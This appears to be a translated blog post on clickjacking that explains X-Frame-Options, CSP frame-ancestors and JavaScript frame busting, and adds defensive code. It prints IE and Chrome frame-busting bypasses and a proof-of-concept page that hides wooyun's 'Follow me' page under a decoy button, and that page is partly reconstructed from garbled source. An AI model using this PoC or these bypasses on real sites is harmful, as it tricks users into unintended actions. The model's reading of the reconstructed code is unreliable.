"Follow me"

Source: Internet
Author: User

This post is mainly about "clickjacking", an attack that has existed for many years but has never been taken seriously.

Application scenario:
1. The community "follow" function. In the web era, "Follow me" has become a standard feature of every community, and the more followers a user has, the more influence they have in that community.

Clickjacking:
Simply put, the attacker embeds the website to be attacked in a web page, makes the embedded site transparent, and then overlays a layer of decoy content that leads you to click where he wants you to. What you actually click is the embedded website, and that completes a clickjacking attack.

Preventing embedding: how can this problem be solved?
Because clickjacking has been around for many years, most mainstream browsers provide a defense.
1. The X-Frame-Options HTTP response header
Three options:
(1) DENY: the page cannot be embedded in any website.
(2) SAMEORIGIN: only pages from the same origin may embed it.
(3) ALLOW-FROM uri: uri is a specified address, and only that uri may embed the page.
For a website this approach works well; the drawback is that earlier versions of IE do not support it.
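The following is an added example, not code from the original post: it decides, the way a browser does, whether a page served with a given set of response headers may be rendered inside a frame, and reports which mechanism made the decision. It also covers the Content-Security-Policy frame-ancestors directive, which is the modern replacement for X-Frame-Options and takes precedence when both headers are present; ALLOW-FROM in particular was only ever honoured by IE and older Firefox, so relying on it leaves Chrome and Safari users unprotected. All header values and URLs in the comments and tests are constructed sample inputs.

```javascript
// Added example (not part of the original post): decide, the way a browser does,
// whether a page served with the given response headers may be rendered inside a
// frame, and name the mechanism that made the decision. Header values and URLs
// used in comments and tests are constructed sample inputs.

function lowerKeys(headers) {
  return Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v])
  );
}

// Origin (scheme://host[:port]) of an absolute URL, or null if it does not parse.
function originOf(url) {
  try {
    return new URL(url).origin;
  } catch (err) {
    return null;
  }
}

// X-Frame-Options is one of DENY, SAMEORIGIN or ALLOW-FROM <uri>; anything else is
// invalid and browsers ignore the header entirely.
function parseXFrameOptions(value) {
  const v = String(value || '').trim();
  const m = /^ALLOW-FROM\s+(\S+)$/i.exec(v);
  if (m) return { directive: 'ALLOW-FROM', uri: m[1] };
  const upper = v.toUpperCase();
  if (upper === 'DENY' || upper === 'SAMEORIGIN') return { directive: upper, uri: null };
  return { directive: null, uri: null };
}

// Source list of a CSP frame-ancestors directive, or null when the directive is
// absent. Handled subset: 'none', 'self' and full-origin sources such as
// https://partner.example (host-only sources and wildcards are not handled here).
function parseFrameAncestors(csp) {
  const directive = String(csp || '')
    .split(';')
    .map((d) => d.trim())
    .find((d) => /^frame-ancestors(\s|$)/i.test(d));
  if (!directive) return null;
  return directive
    .split(/\s+/)
    .slice(1)
    .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
}

// Returns { allowed, mechanism } for pageUrl when framed by a document at framerUrl.
function framingAllowed(headers, pageUrl, framerUrl) {
  const page = originOf(pageUrl);
  const framer = originOf(framerUrl);
  if (page === null || framer === null) throw new TypeError('absolute URLs required');
  const h = lowerKeys(headers);

  // When both headers are present, frame-ancestors wins and X-Frame-Options is ignored.
  const ancestors = parseFrameAncestors(h['content-security-policy']);
  if (ancestors) {
    const allowed =
      !ancestors.includes('none') &&
      ((ancestors.includes('self') && framer === page) ||
        ancestors.some((src) => originOf(src) === framer));
    return { allowed, mechanism: 'csp frame-ancestors' };
  }

  const xfo = parseXFrameOptions(h['x-frame-options']);
  switch (xfo.directive) {
    case 'DENY':
      return { allowed: false, mechanism: 'x-frame-options' };
    case 'SAMEORIGIN':
      return { allowed: framer === page, mechanism: 'x-frame-options' };
    case 'ALLOW-FROM':
      // Only IE and older Firefox ever honoured ALLOW-FROM; Chrome and Safari treat
      // the header as invalid, which means no protection at all in those browsers.
      return {
        allowed: originOf(xfo.uri) === framer,
        mechanism: 'x-frame-options ALLOW-FROM (IE/old Firefox only)',
      };
    default:
      // No anti-framing header: the page is relying on JS frame busting alone.
      return { allowed: true, mechanism: 'none' };
  }
}
```

A mechanism of 'none' is the case the rest of this post is about: nothing stops the browser from rendering the page in an attacker's iframe, and only client-side script stands in the way. Sending both `Content-Security-Policy: frame-ancestors 'none'` and `X-Frame-Options: DENY` covers modern and legacy browsers at the same time.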

2. Frame busting
In short, the page uses JavaScript to detect whether it has been embedded.
Classic frame-busting code:
if (top.location !== self.location) top.location=self.location;
Frame busting of this kind can still be bypassed:
(1) Bypass in IE:
if(self.ActiveXObject)var location={};
(2) Bypass in Chrome, which occasionally fails because it relies on winning a timing race:
if(self.chrome)setInterval('location="javascript:void(0)"');//Chrome
Wooyun uses the classic frame busting, so wooyun is used as the example here.

PoC against wooyun's "Follow me" function:
<script>
var xx=200;
var yy=200;
window.onload=function (e){
    var iframe = document.getElementById('xxx');
    var e = e||window.event;

    // Reconstructed from garbled source text; these two values are computed but never used below.
    var x = e.clientX + (document.body.scrollLeft || document.documentElement.scrollLeft);
    var y = e.clientY + (document.body.scrollTop || document.documentElement.scrollTop);

    // 'a' is the id of the button below (IE exposes element ids as globals);
    // the transparent iframe is positioned relative to it.
    iframe.style.left = a.offsetLeft-xx;
    iframe.style.top = a.offsetTop-yy;
}
</script>
<script>
if (self.ActiveXObject) var location = {}; // IE
if (self.chrome) setInterval('location="javascript:void(0)"'); // Chrome
</script>
<iframe style="position:absolute; opacity:0.5; filter:alpha(opacity=50); z-index:1;" id="xxx" src="http://www.wooyun.org/whitehats/Sogili" width="60%" height="500"></iframe>
<br><center><button id="a">click</button></center>
To reuse this, change the iframe address; the width, height and the two variables xx and yy should be adjusted to suit.
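For the defending side, here is an added example that is neither wooyun's code nor part of the original post: the "hidden by default" frame-busting pattern. It assumes the page ships with `<style>html { display: none }</style>` and only the script reveals it, so a framer that neutralises the `top.location` assignment, as the IE and Chrome tricks in the PoC do, is left with an invisible page that nobody can be tricked into clicking. The classic check above leaves the page visible from the start, which is exactly what those tricks exploit. The `win` and `doc` arguments and the `fakeEnvironment` helper are assumptions made so that the logic can run outside a browser.

```javascript
// Added example (not wooyun's code or the post's): the "hidden by default"
// frame-busting pattern. The page is assumed to ship with
//   <style>html { display: none }</style>
// and only this script reveals it, so a framer that neutralises the top.location
// assignment, as the IE and Chrome tricks in the PoC do, is left with an invisible
// page that cannot be clicked. The classic check shown earlier leaves the page
// visible from the start, which is exactly what those tricks exploit.
// win and doc are injected so the logic can be exercised outside a browser; in a
// real page the call is frameBust(window, document).

function frameBust(win, doc) {
  if (win.self === win.top) {
    doc.documentElement.style.display = 'block'; // not framed: reveal the page
    return 'shown';
  }
  // Framed: attempt to break out, but never reveal the page here. Whether or not the
  // navigation goes through, a hidden page gives the framer nothing to overlay.
  try {
    win.top.location = win.self.location;
  } catch (err) {
    // Cross-origin access to top may throw; the page stays hidden either way.
  }
  return 'hidden';
}

// Constructed fake environment (not a real browser) for running frameBust offline.
// navigationBlocked models a framer that swallows writes to top.location.
function fakeEnvironment({ framed, navigationBlocked = false }) {
  const doc = { documentElement: { style: { display: 'none' } } }; // the CSS default
  const self = { location: 'https://site.example/follow' };
  let top = self;
  if (framed) {
    let current = 'https://attacker.example/';
    top = {};
    Object.defineProperty(top, 'location', {
      get: () => current,
      set: (value) => {
        if (!navigationBlocked) current = value;
      },
    });
  }
  return { win: { self, top }, doc };
}
```

This is defence in depth, not a replacement for the headers in the previous section: X-Frame-Options or frame-ancestors stops the frame from being rendered at all, while this script only limits the damage when the page is framed anyway.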
